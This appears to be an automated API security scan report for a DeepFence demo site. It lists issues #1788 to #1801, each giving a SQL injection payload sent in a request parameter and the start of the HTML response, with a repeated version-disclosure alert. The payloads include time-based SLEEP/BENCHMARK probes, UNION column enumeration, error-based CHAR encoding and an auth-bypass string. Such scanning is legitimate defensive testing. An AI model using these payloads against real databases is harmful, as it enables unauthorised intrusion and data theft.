href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1788\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(\n88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)\n+CHAR(69)+CHAR(65)))#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1789\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP\n)\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1790\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1791\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin\") or (\"1\"=\"1\"#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1792\nScan SQL InjectionSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# HAVING 1=0#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1793\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1794\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ' '\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1795\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# and (select substring(@@version,2,1))='y'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1796\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1797Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# or SLEEP(5)=\"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1798\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1\n#UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1799\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# or SLEEP(5)='\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1800\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nDemoUser1# UNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,\nNULL,NULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1801\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 